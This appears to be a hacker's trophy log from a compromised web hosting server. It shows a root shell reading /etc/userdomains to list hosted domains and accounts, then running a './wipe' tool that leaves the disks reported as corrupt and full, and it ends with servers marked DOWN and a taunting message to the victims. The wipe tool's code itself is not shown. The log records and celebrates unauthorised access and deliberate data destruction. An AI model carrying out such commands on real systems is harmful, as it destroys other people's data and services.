screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
|
|
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso
|
|
|
|
sh-3.2# cat /etc/userdomains
|
|
advertising.ssanz.net: adserver
|
|
forums.visit4cash.net: forumsv4
|
|
megacashzone.com: megacash
|
|
visit4cash.net: visit4ca
|
|
seanone.com: seanonec
|
|
backup2.ssanz.net: backup2
|
|
*: nobody
|
|
|
|
sh-3.2# df -h
|
|
Filesystem Size Used Avail Use% Mounted on
|
|
/dev/sda3 31G 7.5G 22G 26% /
|
|
/dev/sdb1 452G 35G 394G 9% /home
|
|
/dev/sda1 99M 23M 72M 24% /boot
|
|
tmpfs 495M 4.0K 495M 1% /dev/shm
|
|
/usr/tmpDSK 485M 14M 446M 3% /tmp
|
|
|
|
sh-3.2# who
|
|
root pts/0 2009-07-03 20:18 (125.238.144.224)
|
|
|
|
sh-3.2# ./wipe
|
|
|
|
sh-3.2# df -h
|
|
Filesystem Size Used Avail Use% Mounted on
|
|
/dev/sda3 64Z 64Z 24G 100% /
|
|
/dev/sdb1 64Z 64Z 417G 100% /home
|
|
/dev/sda1 16Z 16Z 77M 100% /boot
|
|
tmpfs 495M 4.0K 495M 1% /dev/shm
|
|
/usr/tmpDSK 485M 14M 446M 3% /tmp
|
|
|
|
sh-3.2# exit
|
|
exit
|
|
|
|
|
|
-----------------------------------
|
|
|
|
osiris [ DOWN ]
|
|
devil [ DOWN ]
|
|
|
|
-----------------------------------
|
|
|
|
Once again, practice what you preach. Don't claim to be something you're not.
|
|
Most importantly, don't go after us. We're not the problem. What you say does
|
|
not align AT ALL with what you actually do with your servers.
|
|
|
|
Fix that first, you dig?
|
|
|
|
~ There will always be no way out.
|
|
|